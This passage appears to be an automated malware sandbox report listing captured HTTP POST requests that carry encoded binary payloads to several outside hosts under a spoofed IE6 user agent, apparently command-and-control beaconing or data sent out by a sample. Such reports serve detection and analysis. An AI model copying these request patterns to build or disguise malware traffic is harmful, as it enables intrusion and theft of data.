59 2b 6e 47 62 54 73 41 67 39 39 34 56 50 49 35 77 59 53 7a 6f 49 4f 44 5a 37 41 48 41 58 2b 73 45 78 54 4a 45 76 6e 68 7a 62 70 78 65 78 51 4b 55 38 41 2f 42 70 79 49 74 48 67 78 64 6b 50 30 6a 6e 49 42 33 2f 4f 69 37 4e 39 59 79 54 41 51 6b 3d Data Ascii: ojxbsrw70Whw0LFJZ+M3wk8qCKBUe4aMsGg+ruH5bYy6BSyT+yUvLxSYoSYT4ZCI+mFNz2wloFBQ7K7Du9ydNrps/eOPyrLkJ//0OFAg5i9imRIRuLenAvBNsRIhzjjI/NbxeNgnrRtJkEX/Ge4HO6aIS+0o7Hps4Ion4fW4NrkItok/TO6MtScKIHVg4rVJV8F5+JSidQBQeutGFNyUf+xyTZ79CswGozCW5ygE0799CcT95Ha8H1mxajhjGCD46Ol6UIU+oDGsbdQ6+C6ap2jTYGgD+Lsb1ZvndxT0Df1YCgVOBGZA05SUv/BKdHfb+bhocT00i0JbtcyC93vEcnaAIg6OSKFtwpBLSmhnisVr6q6vmpx/gYfYd1S7olRxsqkSiOGZcj9vWRreMlhVh3Z7Vt9B0vfWZ3jV9WlhbsSH5kmmqHqo6j1fh1rWqMigcw1vA79z30zKUlWMxXqLk05+RwC4kkY+nGbTsAg994VPI5wYSzoIODZ7AHAX+sExTJEvnhzbpxexQKU8A/BpyItHgxdkP0jnIB3/Oi7N9YyTAQk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 34 69 34 4a 6e 54 4e 37 36 57 69 6a 72 38 4a 5a 65 6f 5a 62 6e 39 7a 54 34 50 6d 5a 77 51 7a 2f 46 34 52 2b 79 78 7a 75 4a 4d 63 31 7a 33 70 4a 6b 37 32 36 48 72 50 6f 47 78 47 4f 45 66 47 32 37 2b 39 41 42 76 6e 76 33 50 66 33 38 71 46 34 74 51 75 4f 64 2f 6a 71 63 47 39 6a 75 49 57 61 38 4c 72 62 34 6b 33 4d 5a 48 35 61 39 72 39 73 50 68 57 4e 49 6d 30 43 6e 70 5a 39 42 68 69 46 32 45 45 2f 79 6d 4d 54 2f 44 61 57 33 6b 55 69 48 52 54 72 57 32 4b 53 53 62 43 69 52 77 44 47 48 52 4f 38 65 69 4a 6a 53 2f 30 4e 67 38 42 74 66 35 41 39 34 7a 55 42 48 71 46 4e 44 43 72 48 7a 45 77 4f 4c 47 53 52 6d 53 53 34 75 76 69 66 4b 56 57 4d 52 31 32 53 39 67 7a 4d 34 51 56 56 78 37 46 71 49 57 4e 4a 73 4c 35 32 6e 62 45 69 55 6f 41 75 38 43 57 65 35 73 50 49 79 33 73 38 33 32 66 56 2b 43 72 47 45 72 55 35 76 79 54 38 63 38 78 4d 68 59 2b 34 49 6e 59 77 49 4e 39 61 6b 39 2f 47 47 34 6f 6b 35 75 54 4a 6b 42 77 50 33 76 2f 4f 6c 53 56 2b 31 38 6d 56 35 2f 6e 71 6d 51 6c 63 6d 52 73 58 34 6e 7a 68 56 2f 6b 62 31 53 6d 49 70 41 70 4e 66 36 47 6a 63 4f 64 6a 46 64 4a 74 69 45 6f 2b 34 6c 77 30 32 6c 68 64 4e 48 57 4a 34 65 46 54 51 51 7a 65 38 57 32 35 36 58 76 52 79 31 30 56 68 42 50 69 43 7a 61 34 43 4a 72 66 54 6b 31 7a 52 73 4b 55 69 50 4f 4d 4a 51 4f 5a 4b 48 6d 48 64 4c 39 51 58 32 6d 5a 4b 58 44 4e 4f 51 31 4b 47 53 31 6c 55 39 6f 2b 6f 4a 6e 43 47 30 56 50 42 48 4c 76 43 35 74 55 79 4c 76 2b 5a 79 61 32 41 78 54 71 49 70 4d 65 32 36 4a 48 78 65 6d 76 6e 56 54 59 38 47 46 52 61 6f 59 58 48 68 37 2b 42 77 34 44 72 68 76 48 63 38 6d 50 48 64 53 73 35 33 74 71 53 52 6e 35 43 56 33 6b 63 63 69 73 Data Ascii: 4i4JnTN76Wijr8JZeoZbn9zT4PmZwQz/F4R+yxzuJMc1z3pJk726HrPoGxGOEfG27+9ABvnv3Pf38qF4tQuOd/jqcG9juIWa8Lrb4k3MZH5a9r9sPhWNIm0CnpZ9BhiF2EE/ymMT/DaW3kUiHRTrW2KSSbCiRwDGHRO8eiJjS/0Ng8Btf5A94zUBHqFNDCrHzEwOLGSRmSS4uvifKVWMR12S9gzM4QVVx7FqIWNJsL52nbEiUoAu8CWe5sPIy3s832fV+CrGErU5vyT8c8xMhY+4InYwIN9ak9/GG4ok5uTJkBwP3v/OlSV+18mV5/nqmQlcmRsX4nzhV/kb1SmIpApNf6GjcOdjFdJtiEo+4lw02lhdNHWJ4eFTQQze8W256XvRy10VhBPiCza4CJrfTk1zRsKUiPOMJQOZKHmHdL9QX2mZKXDNOQ1KGS1lU9o+oJnCG0VPBHLvC5tUyLv+Zya2AxTqIpMe26JHxemvnVTY8GFRaoYXHh7+Bw4DrhvHc8mPHdSs53tqSRn5CV3kccis
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=37744f3bc4c59251d28a660bad74e6c5|102.129.143.78|1679460207|1679460189|9|2|0; snkz=102.129.143.78Data Raw: 4a 4a 79 70 6e 6e 77 34 34 57 6a 43 4d 50 6a 55 4a 7a 6c 38 30 41 38 42 61 2f 4d 55 78 33 4f 49 63 4a 45 65 57 79 43 78 4f 71 77 41 2f 44 4a 58 38 4c 76 6a 45 59 38 53 30 71 46 66 35 69 69 59 62 47 2f 57 75 6a 48 68 73 32 74 67 57 5a 73 47 70 68 70 51 37 52 66 57 7a 74 77 37 59 50 2b 36 36 50 42 76 4f 6a 34 51 6b 57 4c 6e 4d 30 62 64 46 39 33 63 35 2b 35 2f 50 7a 6c 44 7a 44 79 4c 33 79 6e 32 41 72 75 6b 6b 4d 4b 58 56 67 75 73 6d 50 6f 69 76 49 58 6b 57 66 6a 4f 6d 2b 6e 2b 31 65 64 71 58 6c 52 78 34 30 35 78 30 47 44 55 44 33 69 54 2f 57 71 30 76 76 45 6b 4f 33 56 63 6b 4d 52 4b 73 52 38 42 69 4d 33 49 61 6f 71 55 58 65 7a 62 47 66 43 73 2f 2b 6e 48 34 6e 54 63 61 52 4d 43 30 71 69 4f 4a 72 54 30 53 34 75 61 42 38 53 4a 73 30 36 6f 61 51 6f 47 69 44 46 6d 52 6d 30 4b 6b 71 47 44 48 69 6d 48 36 46 76 4e 71 65 6b 38 37 47 58 69 76 63 36 6e 58 66 4f 74 73 4a 53 6c 65 46 67 4d 41 4d 2b 47 72 43 4e 68 63 4b 6a 4c 52 58 37 47 66 6a 68 5a 4b 5a 79 64 48 67 56 53 54 41 48 63 57 56 72 6b 69 50 4b 39 72 43 62 32 7a 57 41 50 68 47 56 6b 74 45 75 4a 38 59 67 79 2f 53 35 37 4a 4a 57 2f 67 45 4a 42 45 64 36 31 41 6c 6e 74 36 2f 51 6e 77 6a 52 63 6a 61 58 47 32 51 72 72 41 78 67 44 63 33 4b 67 70 4c 6a 5a 2b 77 6b 48 72 6b 72 62 67 31 7a 65 72 75 67 6d 77 73 4a 34 35 42 49 38 47 2b 61 77 2b 58 77 48 78 61 36 41 54 6f 79 65 38 75 6d 4d 5a 76 78 6b 4d 52 69 36 4a 54 63 38 72 56 6c 44 6d 43 6a 4c 30 4f 71 36 4f 35 6b 4c 75 76 59 59 45 4d 6e 32 35 55 45 70 6b 42 52 38 62 70 30 6b 73 38 46 71 4c 2b 64 70 58 54 4f 68 39 41 70 74 32 7a 41 37 79 44 37 59 70 38 6b 66 69 46 79 32 75 68 73 72 56 4c 76 76 50 4f 59 6c 38 52 75 36 76 35 46 78 46 67 65 66 7a 50 37 74 44 66 77 3d Data Ascii: JJypnnw44WjCMPjUJzl80A8Ba/MUx3OIcJEeWyCxOqwA/DJX8LvjEY8S0qFf5iiYbG/WujHhs2tgWZsGphpQ7RfWztw7YP+66PBvOj4QkWLnM0bdF93c5+5/PzlDzDyL3yn2ArukkMKXVgusmPoivIXkWfjOm+n+1edqXlRx405x0GDUD3iT/Wq0vvEkO3VckMRKsR8BiM3IaoqUXezbGfCs/+nH4nTcaRMC0qiOJrT0S4uaB8SJs06oaQoGiDFmRm0KkqGDHimH6FvNqek87GXivc6nXfOtsJSleFgMAM+GrCNhcKjLRX7GfjhZKZydHgVSTAHcWVrkiPK9rCb2zWAPhGVktEuJ8Ygy/S57JJW/gEJBEd61Alnt6/QnwjRcjaXG2QrrAxgDc3KgpLjZ+wkHrkrbg1zerugmwsJ45BI8G+aw+XwHxa6AToye8umMZvxkMRi6JTc8rVlDmCjL0Oq6O5kLuvYYEMn25UEpkBR8bp0ks8FqL+dpXTOh9Apt2zA7yD7Yp8kfiFy2uhsrVLvvPOYl8Ru6v5FxFgefzP7tDfw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 35 77 66 4e 4e 42 32 35 39 6d 68 56 6d 74 65 2f 56 4f 65 4d 38 6c 62 4c 44 6c 62 4c 76 75 59 6f 6f 66 4e 32 51 34 4c 79 32 56 56 49 72 70 75 44 65 4f 6a 50 57 67 6f 79 64 37 64 6e 52 34 67 78 70 31 52 54 4f 68 73 50 2b 4b 33 7a 51 75 49 5a 63 62 33 65 64 56 4b 4c 68 31 35 37 57 58 6a 72 42 66 48 74 30 53 64 34 39 31 6a 64 47 32 4b 65 4f 6d 6f 6c 70 4e 72 54 6b 2b 46 32 62 70 66 6c 6b 46 71 69 69 59 63 52 64 6a 58 78 2b 35 54 63 78 4b 75 55 63 51 4c 5a 5a 4f 77 2b 61 6f 42 69 62 6e 56 69 61 6d 31 36 34 50 38 48 4d 69 79 70 6b 52 4c 2b 6a 6e 52 46 41 6f 53 6b 75 35 58 79 72 46 57 43 78 52 30 54 76 34 31 6b 57 50 53 78 59 4f 62 74 59 53 33 70 72 52 74 48 72 45 31 66 2f 74 59 37 49 46 52 66 2f 72 6c 76 36 67 72 6c 42 34 70 32 58 33 56 50 79 54 6c 4a 34 76 6b 34 73 6a 33 53 53 4d 67 62 30 70 6e 41 33 77 34 69 74 44 75 75 65 38 34 61 54 38 70 4d 66 69 70 78 64 61 7a 7a 73 61 6b 34 59 51 2b 51 4f 47 34 50 69 77 5a 4d 33 54 59 33 37 6a 6d 63 42 39 57 46 71 30 38 6f 4a 34 51 51 4e 64 43 64 55 50 4c 48 48 48 49 67 71 53 62 4f 6d 51 35 48 5a 39 66 79 2f 30 65 48 52 6e 79 38 66 2b 7a 6f 6c 32 6d 34 42 61 48 6e 77 46 6a 66 43 64 4b 49 50 4b 4c 73 37 4a 42 72 77 45 4a 4c 61 64 65 58 43 47 43 46 70 6c 64 58 76 66 6d 39 4d 43 77 4c 52 45 75 6a 61 35 34 6f 5a 75 41 65 6f 58 64 7a 34 5a 62 32 63 54 4b 62 47 35 49 57 51 49 43 78 4c 42 4f 47 46 4f 52 63 6c 70 64 55 74 43 4d 2b 70 71 34 50 7a 64 62 32 78 59 6e 58 78 55 65 67 5a 6b 35 39 69 68 79 59 62 52 55 44 36 65 54 32 30 65 4c 6b 67 68 6e 37 6e 36 6f 67 49 66 6f 52 52 36 4a 46 70 32 64 48 71 71 53 46 31 51 68 34 31 2f 72 5a 30 41 4d 54 54 67 52 6d 6e 59 73 45 43 4e 67 72 4b 67 65 4e 48 4f 30 6b 6a 7a 4a 6d 31 6b 41 4a 30 79 41 78 74 56 4d 53 6f 76 70 6a 59 39 4d 77 77 39 56 4f 52 34 6f 3d Data Ascii: 5wfNNB259mhVmte/VOeM8lbLDlbLvuYoofN2Q4Ly2VVIrpuDeOjPWgoyd7dnR4gxp1RTOhsP+K3zQuIZcb3edVKLh157WXjrBfHt0Sd491jdG2KeOmolpNrTk+F2bpflkFqiiYcRdjXx+5TcxKuUcQLZZOw+aoBibnViam164P8HMiypkRL+jnRFAoSku5XyrFWCxR0Tv41kWPSxYObtYS3prRtHrE1f/tY7IFRf/rlv6grlB4p2X3VPyTlJ4vk4sj3SSMgb0pnA3w4itDuue84aT8pMfipxdazzsak4YQ+QOG4PiwZM3TY37jmcB9WFq08oJ4QQNdCdUPLHHHIgqSbOmQ5HZ9fy/0eHRny8f+zol2m4BaHnwFjfCdKIPKLs7JBrwEJLadeXCGCFpldXvfm9MCwLREuja54oZuAeoXdz4Zb2cTKbG5IWQICxLBOGFORclpdUtCM+pq4Pzdb2xYnXxUegZk59ihyYbRUD6eT20eLkghn7n6ogIfoRR6JFp2dHqqSF1Qh41/rZ0AMTTgRmnYsECNgrKgeNHO0kjzJm1kAJ0yAxtVMSovpjY9Mww9VOR4o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 71 4e 4d 4f 4e 54 32 37 39 6d 6a 34 76 4a 50 61 39 4d 4f 46 4b 48 61 79 30 36 31 72 4f 78 32 6b 77 63 2b 43 5a 72 30 5a 50 64 31 35 57 69 38 71 39 59 37 6c 46 62 53 32 77 71 38 71 2f 2f 30 6a 79 6b 50 36 4c 71 55 7a 4e 43 63 57 4e 52 43 4d 71 4d 45 7a 4c 4b 63 53 53 46 47 6f 53 42 48 58 31 45 4d 72 55 4f 77 36 2b 68 47 42 54 73 4b 55 7a 73 4f 65 69 2b 6c 68 52 56 56 35 6b 6b 78 34 70 55 57 51 42 67 38 2f 58 31 73 4f 35 6c 79 7a 4f 65 77 31 58 38 79 35 55 4a 76 49 39 36 48 6d 6b 47 6b 2b 63 6a 78 4e 4c 35 5a 2b 6c 64 63 7a 6c 76 39 70 2b 59 45 35 48 7a 74 42 70 73 49 54 74 6e 51 6c 51 51 30 72 4f 58 75 54 6d 4b 32 68 61 4c 36 33 46 47 59 59 6c 30 37 61 2b 43 33 50 55 34 63 7a 75 7a 36 75 47 71 58 53 61 5a 48 65 6c 5a 6b 34 50 4e 49 73 64 49 77 6b 32 33 61 6f 58 63 73 62 2f 2f 74 64 53 52 45 4b 68 48 78 51 75 4e 6f 4e 6e 6c 69 31 4e 54 68 4b 6b 72 38 42 65 78 45 35 71 6b 43 4b 46 46 56 6e 5a 4a 62 72 50 67 32 41 4e 41 2f 47 47 2b 31 36 44 2f 43 4b 79 30 6b 50 41 4d 48 66 50 67 67 35 6c 50 37 68 72 4c 31 6c 47 4c 7a 48 36 4d 73 4f 45 64 33 65 2f 61 72 36 78 70 61 43 79 69 73 4c 31 65 6a 70 62 61 47 2f 35 31 37 45 56 6c 68 77 31 30 6f 67 41 4d 7a 49 4a 44 66 65 59 39 41 6b 34 4e 31 58 6a 44 6c 6b 50 36 35 61 4f 54 67 41 45 45 4f 49 65 68 42 42 37 74 41 47 69 76 68 6b 38 65 41 31 34 48 79 36 4e 32 6b 71 74 6d 31 4d 65 72 70 73 6b 59 6f 6e 74 70 4c 42 57 6c 48 59 41 76 6b 42 6e 4f 4d 58 34 4d 53 30 77 65 70 6a 79 2b 31 55 6f 51 75 49 6a 31 33 62 6e 66 38 36 30 32 44 36 54 68 79 65 4a 58 2f 59 42 67 4e 71 4c 46 49 4a 44 2b 31 49 48 70 4b 4c 57 69 43 7a 47 46 52 6a 6f 36 50 50 59 34 4b 4d 6b 68 76 54 56 64 59 58 4f 4a 57 71 69 7a 48 46 66 6a 5a 6c 66 61 4e 79 6f 46 4f 75 64 43 32 6b 74 6d 65 4a 41 41 2f 6a 6b 66 42 73 4c 6f 62 79 71 6d 2f 62 45 75 73 3d Data Ascii: qNMONT279mj4vJPa9MOFKHay061rOx2kwc+CZr0ZPd15Wi8q9Y7lFbS2wq8q//0jykP6LqUzNCcWNRCMqMEzLKcSSFGoSBHX1EMrUOw6+hGBTsKUzsOei+lhRVV5kkx4pUWQBg8/X1sO5lyzOew1X8y5UJvI96HmkGk+cjxNL5Z+ldczlv9p+YE5HztBpsITtnQlQQ0rOXuTmK2haL63FGYYl07a+C3PU4czuz6uGqXSaZHelZk4PNIsdIwk23aoXcsb//tdSREKhHxQuNoNnli1NThKkr8BexE5qkCKFFVnZJbrPg2ANA/GG+16D/CKy0kPAMHfPgg5lP7hrL1lGLzH6MsOEd3e/ar6xpaCyisL1ejpbaG/517EVlhw10ogAMzIJDfeY9Ak4N1XjDlkP65aOTgAEEOIehBB7tAGivhk8eA14Hy6N2kqtm1MerpskYontpLBWlHYAvkBnOMX4MS0wepjy+1UoQuIj13bnf8602D6ThyeJX/YBgNqLFIJD+1IHpKLWiCzGFRjo6PPY4KMkhvTVdYXOJWqizHFfjZlfaNyoFOudC2ktmeJAA/jkfBsLobyqm/bEus=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 47 6e 43 72 4e 56 54 41 39 6d 67 2f 59 4c 61 64 4c 79 2f 4d 71 61 64 53 73 39 33 4d 52 2b 4c 51 79 4b 72 38 6f 56 62 79 70 38 63 74 70 2b 58 6e 64 71 45 6e 63 4a 74 57 52 2b 52 73 4c 4c 58 43 34 37 4f 59 58 34 2f 2b 71 44 79 44 6b 55 65 55 68 72 76 37 37 47 30 31 4b 78 68 65 48 5a 68 73 2b 6c 70 42 6c 4b 67 36 59 30 42 51 57 6e 36 32 51 74 43 4e 35 55 69 59 71 79 64 75 52 42 68 31 55 52 33 52 30 64 77 71 5a 74 32 6b 61 5a 65 55 47 42 51 41 4e 66 48 65 6f 32 37 4c 34 49 6d 46 76 43 41 78 53 46 78 4a 48 36 5a 32 78 39 4c 44 79 61 77 73 2f 56 42 50 6b 48 36 4a 72 4e 6a 79 51 61 62 61 6e 32 30 6d 57 30 49 69 6f 4e 6c 7a 6e 68 49 50 48 62 4a 39 4a 34 44 69 58 6d 4c 4f 44 61 4d 2b 47 42 37 59 36 6a 75 47 2f 67 36 2f 36 30 74 66 62 4e 43 62 66 74 64 32 4f 53 34 59 35 74 69 4f 34 70 6a 52 41 61 53 4b 79 54 2b 55 74 49 6c 48 6b 6a 36 6a 56 79 66 43 6b 63 66 2b 4c 51 4f 68 59 39 79 78 77 58 6c 78 6e 41 32 61 52 42 63 73 43 35 75 34 54 2b 35 42 30 4b 6a 41 73 62 76 36 2b 61 61 70 55 45 42 46 4a 41 74 30 74 6a 34 2b 53 50 42 51 36 58 62 5a 57 49 77 50 6a 34 6c 69 6b 77 50 58 2f 4f 50 31 31 6b 35 32 36 56 2b 63 72 74 6f 4b 53 2f 2b 66 63 61 55 61 37 6e 32 64 52 75 31 43 71 4f 68 46 66 7a 5a 34 56 6a 79 72 64 63 52 39 37 33 4b 72 67 38 48 65 79 7a 65 4f 44 32 59 5a 6f 7a 59 48 5a 51 38 59 4a 64 55 49 6b 34 50 34 42 68 74 67 4a 38 39 66 38 66 45 76 43 2f 64 56 75 45 2b 72 45 2f 57 4b 4c 67 76 70 63 2f 31 69 76 2f 5a 74 4a 63 53 30 2b 30 5a 4f 70 4b 35 4f 45 47 34 34 4e 6a 7a 49 2f 4f 51 37 70 31 6f 74 52 2f 59 69 38 66 2b 54 6f 41 2b 77 6d 46 4e 41 31 59 61 39 4f 6c 65 78 73 69 33 43 44 54 55 36 49 6b 39 63 65 74 39 65 69 54 68 6e 37 73 43 73 4a 70 45 67 31 66 69 43 59 41 3d 3d Data Ascii: GnCrNVTA9mg/YLadLy/MqadSs93MR+LQyKr8oVbyp8ctp+XndqEncJtWR+RsLLXC47OYX4/+qDyDkUeUhrv77G01KxheHZhs+lpBlKg6Y0BQWn62QtCN5UiYqyduRBh1UR3R0dwqZt2kaZeUGBQANfHeo27L4ImFvCAxSFxJH6Z2x9LDyaws/VBPkH6JrNjyQaban20mW0IioNlznhIPHbJ9J4DiXmLODaM+GB7Y6juG/g6/60tfbNCbftd2OS4Y5tiO4pjRAaSKyT+UtIlHkj6jVyfCkcf+LQOhY9yxwXlxnA2aRBcsC5u4T+5B0KjAsbv6+aapUEBFJAt0tj4+SPBQ6XbZWIwPj4likwPX/OP11k526V+crtoKS/+fcaUa7n2dRu1CqOhFfzZ4VjyrdcR973Krg8HeyzeOD2YZozYHZQ8YJdUIk4P4BhtgJ89f8fEvC/dVuE+rE/WKLgvpc/1iv/ZtJcS0+0ZOpK5OEG44NjzI/OQ7p1otR/Yi8f+ToA+wmFNA1Ya9Olexsi3CDTU6Ik9cet9eiThn7sCsJpEg1fiCYA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 47 4f 73 45 42 46 4c 54 37 47 6a 65 31 68 58 2f 42 56 71 71 6a 31 55 67 69 54 2b 69 51 55 64 30 70 71 61 4f 6a 2f 7a 6e 43 37 43 45 77 73 53 49 64 34 53 2f 64 43 4f 70 34 75 63 74 77 6d 6a 52 57 63 46 72 41 56 4e 51 54 57 57 51 54 4d 74 4f 50 41 7a 31 42 44 38 47 46 38 6f 6f 59 41 2b 4a 44 79 7a 5a 6f 77 71 32 69 39 34 66 50 5a 6e 68 30 2f 74 74 46 78 53 2f 4c 31 32 6a 4d 78 37 54 75 77 68 69 65 69 54 62 45 62 6a 34 6d 58 49 55 42 72 7a 51 49 4a 36 4e 64 76 4b 38 6e 6d 52 50 53 61 47 4f 47 59 69 4e 32 36 4a 66 66 2f 75 61 65 31 4b 58 67 4e 34 73 75 36 55 6d 64 38 2b 4a 6a 69 4d 32 68 74 6a 35 49 4a 65 75 62 44 53 59 2b 6a 41 30 42 47 65 75 73 45 62 6d 36 32 6c 49 64 62 5a 6c 65 57 76 46 72 55 71 4d 53 32 34 30 39 77 4e 69 55 74 39 77 47 4f 45 61 47 54 30 6f 36 6a 6c 6c 4f 30 32 31 32 49 30 65 55 58 38 4f 2b 4a 74 41 6e 76 37 59 4f 51 34 49 71 72 6a 39 38 44 6b 57 68 38 6f 32 5a 75 30 78 52 6b 6d 78 66 6a 53 48 35 2b 67 4d 59 72 38 56 67 4e 55 6b 6c 43 59 7a 42 50 45 44 6b 2b 37 6b 6e 31 74 72 44 68 75 31 59 70 2b 36 72 41 66 62 6c 55 51 2b 6b 49 37 78 47 54 67 45 66 30 56 4d 7a 6c 55 79 33 4a 4c 6b 67 32 67 61 67 44 4b 65 6c 52 46 49 70 50 4b 33 35 66 43 59 36 35 4a 4f 39 5a 62 63 49 71 33 51 76 78 63 6a 77 58 71 67 54 64 65 51 48 2b 2f 63 63 57 71 53 74 66 5a 54 7a 41 6e 71 4e 6e 44 6a 71 63 54 53 4b 32 76 59 66 58 46 50 6d 46 6c 66 62 36 63 33 77 6a 53 74 2b 4d 72 4f 44 50 51 48 32 32 7a 41 69 36 4f 4c 61 4c 74 68 69 69 62 48 46 6c 49 43 6b 56 6a 38 67 69 4a 51 65 49 76 62 77 43 58 62 36 6c 30 36 38 45 51 6d 42 70 43 75 38 57 45 55 45 70 36 66 59 69 4b 38 4a 39 33 6f 34 4b 48 53 66 55 63 6f 71 73 52 57 53 61 78 61 38 42 78 65 32 36 7a 63 4f 30 4e 38 74 42 4b 2b 65 50 75 74 31 7a 2f 62 68 74 46 75 7a 49 42 71 Data Ascii: GOsEBFLT7Gje1hX/BVqqj1UgiT+iQUd0pqaOj/znC7CEwsSId4S/dCOp4uctwmjRWcFrAVNQTWWQTMtOPAz1BD8GF8ooYA+JDyzZowq2i94fPZnh0/ttFxS/L12jMx7TuwhieiTbEbj4mXIUBrzQIJ6NdvK8nmRPSaGOGYiN26Jff/uae1KXgN4su6Umd8+JjiM2htj5IJeubDSY+jA0BGeusEbm62lIdbZleWvFrUqMS2409wNiUt9wGOEaGT0o6jllO0212I0eUX8O+JtAnv7YOQ4Iqrj98DkWh8o2Zu0xRkmxfjSH5+gMYr8VgNUklCYzBPEDk+7kn1trDhu1Yp+6rAfblUQ+kI7xGTgEf0VMzlUy3JLkg2gagDKelRFIpPK35fCY65JO9ZbcIq3QvxcjwXqgTdeQH+/ccWqStfZTzAnqNnDjqcTSK2vYfXFPmFlfb6c3wjSt+MrODPQH22zAi6OLaLthiibHFlICkVj8giJQeIvbwCXb6l068EQmBpCu8WEUEp6fYiK8J93o4KHSfUcoqsRWSaxa8Bxe26zcO0N8tBK+ePut1z/bhtFuzIBq
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 35 77 66 4e 4e 42 32 35 39 6d 68 56 6d 74 65 2f 56 4f 65 4d 38 6c 62 4c 44 6c 62 4c 76 75 59 6f 6f 66 4e 32 51 34 4c 79 32 56 56 49 72 70 75 44 65 4f 6a 50 57 67 6f 79 64 37 64 6e 52 34 67 78 70 31 52 54 4f 68 73 50 2b 4b 33 7a 51 75 49 5a 63 62 33 65 64 56 4b 4c 68 31 35 37 57 58 6a 72 42 66 48 74 30 53 64 34 39 31 6a 64 47 32 4b 65 4f 6d 6f 6c 70 4e 72 54 6b 2b 46 32 62 70 66 6c 6b 46 71 69 69 59 63 52 64 6a 58 78 2b 35 54 63 78 4b 75 55 63 51 4c 5a 5a 4f 77 2b 61 6f 42 69 62 6e 56 69 61 6d 31 36 34 50 38 48 4d 69 79 70 6b 52 4c 2b 6a 6e 52 46 41 6f 53 6b 75 35 58 79 72 46 57 43 78 52 30 54 76 34 31 6b 57 50 53 78 59 4f 62 74 59 53 33 70 72 52 74 48 72 45 31 66 2f 74 59 37 49 46 52 66 2f 72 6c 76 36 67 72 6c 42 34 70 32 58 33 56 50 79 54 6c 4a 34 76 6b 34 73 6a 33 53 53 4d 67 62 30 70 6e 41 33 77 34 69 74 44 75 75 65 38 34 61 54 38 70 4d 66 69 70 78 64 61 7a 7a 73 61 6b 34 59 51 2b 51 4f 47 34 50 69 77 5a 4d 33 54 59 33 37 6a 6d 63 42 39 57 46 71 30 38 6f 4a 34 51 51 4e 64 43 64 55 50 4c 48 48 48 49 67 71 53 62 4f 6d 51 35 48 5a 39 66 79 2f 30 65 48 52 6e 79 38 66 2b 7a 6f 6c 32 6d 34 42 61 48 6e 77 46 6a 66 43 64 4b 49 50 4b 4c 73 37 4a 42 72 77 45 4a 4c 61 64 65 58 43 47 43 46 70 6c 64 58 76 66 6d 39 4d 43 77 4c 52 45 75 6a 61 35 34 6f 5a 75 41 65 6f 58 64 7a 34 5a 62 32 63 54 4b 62 47 35 49 57 51 49 43 78 4c 42 4f 47 46 4f 52 63 6c 70 64 55 74 43 4d 2b 70 71 34 50 7a 64 62 32 78 59 6e 58 78 55 65 67 5a 6b 35 39 69 68 79 59 62 52 55 44 36 65 54 32 30 65 4c 6b 67 68 6e 37 6e 36 6f 67 49 66 6f 52 52 36 4a 46 70 32 64 48 71 71 53 46 31 51 68 34 31 2f 72 5a 30 41 4d 54 54 67 52 6d 6e 59 73 45 43 4e 67 72 4b 67 65 4e 48 4f 30 6b 6a 7a 4a 6d 31 6b 41 4a 30 79 41 78 74 56 4d 53 6f 76 70 6a 59 39 4d 77 77 39 56 4f 52 34 6f 3d Data Ascii: 5wfNNB259mhVmte/VOeM8lbLDlbLvuYoofN2Q4Ly2VVIrpuDeOjPWgoyd7dnR4gxp1RTOhsP+K3zQuIZcb3edVKLh157WXjrBfHt0Sd491jdG2KeOmolpNrTk+F2bpflkFqiiYcRdjXx+5TcxKuUcQLZZOw+aoBibnViam164P8HMiypkRL+jnRFAoSku5XyrFWCxR0Tv41kWPSxYObtYS3prRtHrE1f/tY7IFRf/rlv6grlB4p2X3VPyTlJ4vk4sj3SSMgb0pnA3w4itDuue84aT8pMfipxdazzsak4YQ+QOG4PiwZM3TY37jmcB9WFq08oJ4QQNdCdUPLHHHIgqSbOmQ5HZ9fy/0eHRny8f+zol2m4BaHnwFjfCdKIPKLs7JBrwEJLadeXCGCFpldXvfm9MCwLREuja54oZuAeoXdz4Zb2cTKbG5IWQICxLBOGFORclpdUtCM+pq4Pzdb2xYnXxUegZk59ihyYbRUD6eT20eLkghn7n6ogIfoRR6JFp2dHqqSF1Qh41/rZ0AMTTgRmnYsECNgrKgeNHO0kjzJm1kAJ0yAxtVMSovpjY9Mww9VOR4o=
